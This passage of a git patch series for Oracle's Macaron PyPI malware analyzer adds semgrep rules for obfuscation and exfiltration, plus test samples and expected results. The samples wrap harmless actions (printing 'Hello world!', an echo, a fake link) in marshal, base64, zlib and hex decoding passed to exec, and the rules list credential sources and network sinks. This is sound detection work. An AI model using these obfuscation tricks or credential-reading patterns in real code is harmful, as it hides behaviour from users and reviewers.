18088139635c427aa8914b5a8360125915cca4912496c50e530b3200aaa9c4f2132d6d13c595cc7081f10f9f273c51baf41ac410bae5040215948c6d7d58a5e93073fb589b903ddc019fb047eb7d4beacc4be9e0ce3d494c0a9cf93675452d306ba1120109d4b294dcfb0d1ba6486a1255301cc6c495b56b129905c4a4802835c02c518027911266cb1ab899853e8a09f2a65034c41038a4bf9ae8a11b9bd4817ba8d32ca1ab4e00a05149285a02f3380f4458f364ab0f9726362639fc0e196ba9d95d8bb030dfb7dcc8c8a6a1584c03827201049d3aeb199a914090dc01ae2d356829202ceb5b4fccafcb27c96a1148a64de6004dc4a347b278c40b80309b6b6cba8bf8628aaea109c5fc5610d6aac7363f50105e4d426e60e740330466edcef964a979538c493434a5de39955d50b7b7a8ffe1680401c4dbece35ed02da19331c44c2c53df98296d4945ff9280c6f563b4b11040d5a7085020ac94234d71180a508e251cfcfef962288957802455039b33ac85934a1fae55395458431fd0e6bc55512311f665d4995c987fc0c3b67b9796d18944b61c632ac77789c3f0a0231111a0fd07a30e804bb9f85d05a0572cae150ca497360afeb20a07a0614976f195a3712da456a2f654ccfb1d6b406256101030ac94234d40940faca501b25d87cb931b1b14fe0704b73c34a1cf02d030813b637c9bf142eddc68667d3e6550240357e4f7120303f1a53f7946c986788afa79befc329dd610c77e4318705c7d37edbd23c293f774fdd975fd65776697da55e5034aff70eb05ebc19edff0cd1139aa01aa0516615bc081c554ddda4fd178eaff5cbe63846011d763eec47f4a9012a582957d589cbd20c4d04e9758662a4c95ea0d325d70e12ffa9d3e5a7b33a8fcab2c448fbd56d1b62a8d311549a94c46ddb8a098a5b11de4eb8e93ca6f9f3ad22f194d5c0a29dd6b2d80b5a61e966d870688ef10ca7131311d4007e741a8e9f5802ad32a7a32c3b3869e1382686cb077349c418566a11cec979d5e65b76f1fa5576795b3d1f5f760fabdddffb5356bfe679f6ef7cb5ffb17a3b9e56cfdbc361fbfdb0cb7eee4edbd3e9bd6aeebfffde1f4efbb78fcabb5777cfc7d75ffbc3eeee7ef5e7f1ad5aba3abeafa0a9c56562b5a42c5f8f2fbf0fbbb2ac56dddde5ab7f3daeeeda997722046fdbd7e1f2968dd5eef0b1bbb092d50130088d6fad22eabf19efe0434ea834f994b5f02f5fdab7afdd927cf3d58b408db81df644919c4780d74d6ece0cd7ed43c777fb12c0abc9a7164b5695c9feab5d3e1883346aecb33a90e16393fc647e9aff1f99b5fed2'.replace("\n" , ""))).decode()) diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py new file mode 100644 index 000000000..2e30b1e33 --- /dev/null +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -0,0 +1,54 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""Tests for experimental feature detecting malicious patterns in PyPI package sourcecode.""" +import json +import os +from unittest.mock import MagicMock + +import pytest + +import macaron +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult +from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer + + +@pytest.mark.skip(reason="experimental feature") +def test_no_resources() -> None: + """Test for when the semgrep rules can't be found, so error.""" + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path="") + + +@pytest.mark.skip(reason="experimental feature") +def test_no_sourcecode(pypi_package_json: MagicMock) -> None: + """Test for when there is no source code available, so error.""" + analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + + pypi_package_json.package_sourcecode_path = "" + + with pytest.raises(HeuristicAnalyzerValueError): + analyzer.analyze(pypi_package_json) + + +@pytest.mark.skip(reason="experimental feature") +def test_obfuscation_rules(pypi_package_json: MagicMock) -> None: + """Test the semgrep rules for obfuscation on code samples.""" + sample_path = os.path.join( + os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples", "obfuscation" + ) + + with open(os.path.join(sample_path, "expected_results.json"), encoding="utf-8") as file: + expected_results = json.loads(file.read()) + __import__("pprint").pprint(expected_results) + + analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + + pypi_package_json.package_sourcecode_path = sample_path + analyzer.default_rule_path = os.path.join(analyzer.default_rule_path, "obfuscation.yaml") + + result, analysis = analyzer.analyze(pypi_package_json) + + assert result == HeuristicResult.FAIL + assert expected_results == analysis From 2f7e2021e590f60f62afb61c90433aecb3bf42c3 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Tue, 4 Feb 2025 11:13:39 +1000 Subject: [PATCH 07/37] test: finished sample test files for obfuscation rules --- .../pypi_malware_rules/obfuscation.yaml | 9 +- .../obfuscation/decode_and_execute.py | 47 ++++- .../obfuscation/expected_results.json | 193 +++++++++++------- .../pypi/test_pypi_sourcecode_analyzer.py | 6 +- 4 files changed, 173 insertions(+), 82 deletions(-) diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index 76b327578..f6ef8386d 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -114,24 +114,29 @@ rules: - pattern: __import__('marshal').loads(...) # bytes decoding - pattern: | - "...".decode(...) + b'...'.decode(...) - pattern: $BYTES.decode(...) - pattern: bytes.decode(...) + - pattern: builtins.bytes.decode(...) + - pattern: __import__('builtins').bytes.decode(...) - pattern: $BYTES.join(...).decode() # decompression - pattern: zlib.decompress(...) - pattern: __import__('zlib').decompress(...) # base64 decoded string values - pattern: base64.b64decode(...) - - pattern: __import__('base64').decode(...) + - pattern: __import__('base64').b64decode(...) - pattern: b64decode(...) # hex encoded values - pattern: bytes.fromhex(...) + - pattern: builtins.bytes.fromhex(...) + - pattern: __import__('builtins').bytes.fromhex(...) # unicode construction - patterns: - pattern-either: - pattern: $STRING.join(map($FOO, [...])) - pattern: $STRING.join($FOO($VAL) for $VAL in [...]) + - pattern: $STRING.join($FOO($VAL) for $VAL in $ITER) - pattern: $STRING.join($FOO($VAL) for $VAL in $GEN(...)) - metavariable-regex: metavariable: $FOO diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py index 74ce85c19..114072a52 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py @@ -19,8 +19,49 @@ def test_function(): samples. """ sys.exit() + + # NOTE: since these are flows, all will go in subfunctions that they are supposed to be in so the detections + # can be sections out. + # marshal encryption from pyobfuscate.com/marshal-encrypt, script is just print("Hello world!") + def marshal_flow(): + from marshal import loads + bytecode = loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x0c\x00\x00\x00e\x00d\x00\x83\x01\x01\x00d\x01S\x00)\x02z\x0cHello world!N)\x01\xda\x05print\xa9\x00r\x02\x00\x00\x00r\x02\x00\x00\x00\xfa\x08\xda\x08\x01\x00\x00\x00\xf3\x00\x00\x00\x00') + exec(bytecode) + + def marshal_inline_flow(): + exec(__import__('marshal').loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x0c\x00\x00\x00e\x00d\x00\x83\x01\x01\x00d\x01S\x00)\x02z\x0cHello world!N)\x01\xda\x05print\xa9\x00r\x02\x00\x00\x00r\x02\x00\x00\x00\xfa\x08\xda\x08\x01\x00\x00\x00\xf3\x00\x00\x00\x00')) + + def bytes_eval_to_soc_bind(): + import socket + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as soc: + soc.bind(__import__('builtins').eval(b'("127.0.0.1", 0)'.decode())) + + def map_b64_to_request(): + import requests as req + + # decodes to GET + method = __import__('base64').b64decode(b'R0VU') + # just maps to a random fake link https://www.print-hello-world-sample.com/print/hello/world! + link = ''.join(map(chr, [104, 116, 116, 112, 115, 58, 47, 47, 119, 119, 119, 46, 112, 114, 105, 110, 116, 45, 104, 101, 108, 108, 111, 45, 119, 111, 114, 108, 100, 45, 115, 97, 109, 112, 108, 101, 46, 99, 111, 109, 47, 112, 114, 105, 110, 116, 47, 104, 101, 108, 108, 111, 47, 119, 111, 114, 108, 100, 33])) + _ = req.Request(method, link) + + def zlib_ast_subprocess(): + import subprocess + import zlib as zeeee + from ast import literal_eval + + # just decodes to ["echo", "Hello world!"] + subprocess.Popen(literal_eval(zeeee.decompress(b'x\x9c\x8bVOM\xce\xc8W\xd7QP\xf7H\xcd\xc9\xc9W(\xcf/\xcaIQT\x8f\x05\x00]\xa0\x07\x9d').decode())) + + def propagation_to_write(): + import os as e - from marshal import loads - bytecode = loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x0c\x00\x00\x00e\x00d\x00\x83\x01\x01\x00d\x01S\x00)\x02z\x0cHello world!N)\x01\xda\x05print\xa9\x00r\x02\x00\x00\x00r\x02\x00\x00\x00\xfa\x08\xda\x08\x01\x00\x00\x00\xf3\x00\x00\x00\x00') - exec(bytecode) + # symbol propagations should detect assign of os as e to o and bytes to b and still trigger + o = e + b = bytes + # just decodes to "Hello world!" + contents = b.fromhex("48656C6C6F20776F726C6421") + # just decodes to "some_path" + file = o.open(''.join(chr(c) for c in [115, 111, 109, 101, 95, 112, 97, 116, 104]), o.O_RDWR) + o.pwritev(file, contents, 0) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index 3376aa3ed..b369538bf 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -2,11 +2,128 @@ "src.macaron.resources.pypi_malware_rules.decode-and-execute": [ { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", - "start": 26, - "end": 26 + "start": 30, + "end": 30 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 46, + "end": 46 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 53, + "end": 53 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 64, + "end": 64 + } + ], + "src.macaron.resources.pypi_malware_rules.inline-imports": [ + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 33, + "end": 33 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 38, + "end": 38 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 43, + "end": 43 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 49, + "end": 49 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 50, + "end": 50 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 51, + "end": 51 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 52, + "end": 52 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 53, + "end": 53 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 54, + "end": 54 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 55, + "end": 55 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 56, + "end": 56 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 57, + "end": 57 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 58, + "end": 58 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 59, + "end": 59 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 60, + "end": 60 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 61, + "end": 61 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 69, + "end": 69 } ], "src.macaron.resources.pypi_malware_rules.default-assigning": [ + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 59, + "end": 59 + }, { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", "start": 23, @@ -208,78 +325,6 @@ "end": 68 } ], - "src.macaron.resources.pypi_malware_rules.inline-imports": [ - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 49, - "end": 49 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 50, - "end": 50 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 51, - "end": 51 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 52, - "end": 52 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 53, - "end": 53 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 54, - "end": 54 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 55, - "end": 55 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 56, - "end": 56 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 57, - "end": 57 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 58, - "end": 58 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 59, - "end": 59 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 60, - "end": 60 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", - "start": 61, - "end": 61 - }, - { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", - "start": 69, - "end": 69 - } - ], "src.macaron.resources.pypi_malware_rules.obfuscation-tools": [ { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py index 2e30b1e33..a26b354cc 100644 --- a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -14,14 +14,14 @@ from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer -@pytest.mark.skip(reason="experimental feature") +# @pytest.mark.skip(reason="experimental feature") def test_no_resources() -> None: """Test for when the semgrep rules can't be found, so error.""" with pytest.raises(ConfigurationError): _ = PyPISourcecodeAnalyzer(resources_path="") -@pytest.mark.skip(reason="experimental feature") +# @pytest.mark.skip(reason="experimental feature") def test_no_sourcecode(pypi_package_json: MagicMock) -> None: """Test for when there is no source code available, so error.""" analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) @@ -32,7 +32,7 @@ def test_no_sourcecode(pypi_package_json: MagicMock) -> None: analyzer.analyze(pypi_package_json) -@pytest.mark.skip(reason="experimental feature") +# @pytest.mark.skip(reason="experimental feature") def test_obfuscation_rules(pypi_package_json: MagicMock) -> None: """Test the semgrep rules for obfuscation on code samples.""" sample_path = os.path.join( From 92c7c2dcc62be47d3bbc444e1c96a1d5ef1b1ade Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Tue, 4 Feb 2025 11:26:40 +1000 Subject: [PATCH 08/37] fix: obfuscation tests were incorrect --- .../obfuscation/expected_results.json | 20 +++++++++---------- .../pypi/test_pypi_sourcecode_analyzer.py | 6 +++--- 2 files changed, 13 insertions(+), 13 deletions(-) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index b369538bf..03bf0858b 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -17,18 +17,18 @@ }, { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", - "start": 46, - "end": 46 + "start": 47, + "end": 47 }, { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", - "start": 53, - "end": 53 + "start": 55, + "end": 55 }, { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", - "start": 64, - "end": 64 + "start": 67, + "end": 67 } ], "src.macaron.resources.pypi_malware_rules.inline-imports": [ @@ -44,8 +44,8 @@ }, { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", - "start": 43, - "end": 43 + "start": 44, + "end": 44 }, { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", @@ -121,8 +121,8 @@ "src.macaron.resources.pypi_malware_rules.default-assigning": [ { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", - "start": 59, - "end": 59 + "start": 62, + "end": 62 }, { "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py index a26b354cc..2e30b1e33 100644 --- a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -14,14 +14,14 @@ from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer -# @pytest.mark.skip(reason="experimental feature") +@pytest.mark.skip(reason="experimental feature") def test_no_resources() -> None: """Test for when the semgrep rules can't be found, so error.""" with pytest.raises(ConfigurationError): _ = PyPISourcecodeAnalyzer(resources_path="") -# @pytest.mark.skip(reason="experimental feature") +@pytest.mark.skip(reason="experimental feature") def test_no_sourcecode(pypi_package_json: MagicMock) -> None: """Test for when there is no source code available, so error.""" analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) @@ -32,7 +32,7 @@ def test_no_sourcecode(pypi_package_json: MagicMock) -> None: analyzer.analyze(pypi_package_json) -# @pytest.mark.skip(reason="experimental feature") +@pytest.mark.skip(reason="experimental feature") def test_obfuscation_rules(pypi_package_json: MagicMock) -> None: """Test the semgrep rules for obfuscation on code samples.""" sample_path = os.path.join( From e4058949aa98144af6c11db960f56b303c28ef9c Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Tue, 4 Feb 2025 16:47:55 +1000 Subject: [PATCH 09/37] test: tests for exfiltration and fixes to semgrep rules --- .pre-commit-config.yaml | 4 + pyproject.toml | 5 - .../pypi_malware_rules/exfiltration.yaml | 92 ++++++++++++------- .../pypi_malware_rules/obfuscation.yaml | 64 ++++++++++--- .../exfiltration/expected_results.json | 19 ++++ .../exfiltration/remote-exfiltration.py | 50 ++++++++++ .../pypi/test_pypi_sourcecode_analyzer.py | 15 ++- 7 files changed, 195 insertions(+), 54 deletions(-) create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/expected_results.json create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index 94f2d2625..16c2ff3fa 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -30,6 +30,7 @@ repos: - id: isort name: Sort import statements args: [--settings-path, pyproject.toml] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* # Add Black code formatters. - repo: https://github.com/ambv/black @@ -38,6 +39,7 @@ repos: - id: black name: Format code args: [--config, pyproject.toml] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* - repo: https://github.com/asottile/blacken-docs rev: 1.19.1 hooks: @@ -83,6 +85,7 @@ repos: entry: pylint language: python files: ^src/macaron/|^tests/ + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* types: [text, python] args: [--rcfile, pyproject.toml] @@ -108,6 +111,7 @@ repos: files: ^src/macaron/|^tests/ types: [text, python] additional_dependencies: ['bandit[toml]'] + exclude: ^tests/malware_analyzer/pypi/resources/sourcecode_samples.* # Enable a whole bunch of useful helper hooks, too. # See https://pre-commit.com/hooks.html for more hooks. diff --git a/pyproject.toml b/pyproject.toml index 86f57c285..aa93bd1a4 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -123,14 +123,10 @@ Issues = "https://github.com/oracle/macaron/issues" [tool.bandit] tests = [] skips = ["B101"] -exclude_dirs = ['tests/malware_analyzer/pypi/resources/sourcecode_samples'] # https://github.com/psf/black#configuration [tool.black] line-length = 120 -force-exclude = ''' -tests/malware_analyzer/pypi/resources/sourcecode_samples/ -''' # https://github.com/commitizen-tools/commitizen # https://commitizen-tools.github.io/commitizen/bump/ @@ -243,7 +239,6 @@ disable = [ "too-many-statements", "duplicate-code", ] -ignore-paths = "tests/malware_analyzer/pypi/resources/sourcecode_samples" [tool.pylint.MISCELLANEOUS] notes = [ diff --git a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml index fa96f43d3..146d04315 100644 --- a/src/macaron/resources/pypi_malware_rules/exfiltration.yaml +++ b/src/macaron/resources/pypi_malware_rules/exfiltration.yaml @@ -11,6 +11,8 @@ rules: severity: ERROR mode: taint options: + # this will help us detect the flow of objects for exfiltration, like + # "with requests.Session() as s: s.get(...)" symbolic_propagation: true pattern-sources: - pattern-either: @@ -53,6 +55,7 @@ rules: - pattern: os.spawnvp(...) - pattern: os.spawnvpe(...) - pattern: os.system(...) + - pattern: os.popen(...) # using commands module - pattern: commands.getstatusoutput(...) - pattern: commands.getoutput(...) @@ -114,32 +117,18 @@ rules: - pattern: keyring.get_keyring(...) - pattern: keyring.get_password(...) - pattern: keyring.get_credential(...) - - pattern: winreg.ConnectRegistry(...) - - pattern: winreg.LoadKey(...) - - pattern: winreg.OpenKey(...) - - pattern: winreg.OpenKeyEx(...) - - pattern: winreg.QueryInfoKey(...) - - pattern: winreg.QueryValue(...) - - pattern: winreg.QueryValueEx(...) - - pattern: sqlite3.connect(...) # file exfiltration - - patterns: - - pattern: open($FILE, $MODE) - - metavariable-regex: - metavariable: $MODE - regex: r|rt|r+|w+|rb|r+b|w+b|a+|a+b - - patterns: - - pattern: os.open($FILE, $MODE) - - metavariable-regex: - metavariable: $MODE - regex: os\.O_RDONLY|os\.O_RDWR + - pattern: os.read(...) + - pattern: $FILE.read(...) + - pattern: $FILE.readlines(...) + - pattern: yaml.safe_load(...) + - pattern: json.loads(...) pattern-sinks: - pattern-either: # remote connection # using socket module - - pattern: socket.socket(...) - pattern: $SOC.accept(...) - pattern: $SOC.bind(...) - pattern: $SOC.connect(...) @@ -164,23 +153,41 @@ rules: - pattern: requests.delete(...) - pattern: requests.head(...) - pattern: requests.options(...) - - pattern: requests.Session(...) + - pattern: requests.patch(...) + # object creation like requests.Session(...) here is omitted as exfiltrated data likely won't + # be passed into the parameters of those objects + - pattern: requests.Session(...).get(...) + - pattern: requests.Session(...).delete(...) + - pattern: requests.Session(...).head(...) + - pattern: requests.Session(...).options(...) + - pattern: requests.Session(...).patch(...) + - pattern: requests.Session(...).post(...) + - pattern: requests.Session(...).put(...) + - pattern: requests.Session(...).request(...) + - pattern: requests.Session(...).send(...) - pattern: requests.Request(...) # using urllib3 module - - pattern: urllib3.PoolManager(...) - pattern: urllib3.request(...) - - pattern: urllib3.HTTPConnectionPool(...) - - pattern: urllib3.HTTPSConnectionPool(...) - - pattern: urllib3.ConnectionPool(...) - - pattern: urllib3.ProxyManager(...) - - pattern: urllib3.contrib.socks.SOCKSProxyManager(...) + - pattern: urllib3.PoolManager(...).request(...) + - pattern: urllib3.PoolManager(...).request_encode_body(...) + - pattern: urllib3.PoolManager(...).request_encode_url(...) + - pattern: urllib3.PoolManager(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPConnectionPool(...).request(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPSConnectionPool(...).urlopen(...) + - pattern: urllib3.HTTPSConnectionPool(...).request(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_body(...) + - pattern: urllib3.HTTPSConnectionPool(...).request_encode_url(...) + - pattern: urllib3.HTTPConnection(...).request(...) + - pattern: urllib3.HTTPConnection(...).request_chunked(...) + - pattern: urllib3.HTTPSConnection(...).request(...) + - pattern: urllib3.HTTPSConnection(...).request_chunked(...) + - pattern: urllib3.ProxyManager(...).urlopen(...) # using urllib - pattern: urllib.request(...) - pattern: urllib.request.urlopen(...) - # using urlrequest module - - pattern: UrlRequest(...) - - pattern: UrlRequestRequests(...) - - pattern: UrlRequestUrllib(...) # using httpx - pattern: httpx.request(...) - pattern: httpx.get(...) @@ -190,7 +197,24 @@ rules: - pattern: httpx.head(...) - pattern: httpx.options(...) - pattern: httpx.stream(...) - - pattern: httpx.AsyncClient(...) - - pattern: httpx.AsyncHTTPTransport(...) - - pattern: httpx.Client(...) - - pattern: httpx.Request(...) + - pattern: httpx.patch(...) + - pattern: httpx.AsyncClient(...).request(...) + - pattern: httpx.AsyncClient(...).get(...) + - pattern: httpx.AsyncClient(...).post(...) + - pattern: httpx.AsyncClient(...).put(...) + - pattern: httpx.AsyncClient(...).delete(...) + - pattern: httpx.AsyncClient(...).head(...) + - pattern: httpx.AsyncClient(...).options(...) + - pattern: httpx.AsyncClient(...).stream(...) + - pattern: httpx.AsyncClient(...).patch(...) + - pattern: httpx.AsyncClient(...).send(...) + - pattern: httpx.Client(...).request(...) + - pattern: httpx.Client(...).get(...) + - pattern: httpx.Client(...).post(...) + - pattern: httpx.Client(...).put(...) + - pattern: httpx.Client(...).delete(...) + - pattern: httpx.Client(...).head(...) + - pattern: httpx.Client(...).options(...) + - pattern: httpx.Client(...).stream(...) + - pattern: httpx.Client(...).patch(...) + - pattern: httpx.Client(...).send(...) diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml 